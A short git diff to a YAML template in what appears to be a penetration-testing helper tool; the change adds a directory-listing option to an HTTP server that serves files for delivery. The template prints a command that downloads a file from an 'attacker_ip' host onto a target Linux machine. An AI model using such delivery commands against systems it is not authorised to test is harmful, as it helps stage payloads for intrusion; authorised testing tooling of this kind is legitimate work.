--- a/src/profi/templates/scripts/deliver-universal-transfer-outbound.yaml
+++ b/src/profi/templates/scripts/deliver-universal-transfer-outbound.yaml
@@ -17,4 +17,4 @@ content: |
     echo '                       -----Linux------                         '; \
     echo 'Deliver: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/FILE -o <%=$(esh variables/delivery_path_linux)%>/FILE'; \
     echo '================================================================'; \
-     python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+     python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound <%=$(esh variables/delivery_dir_listing)%>
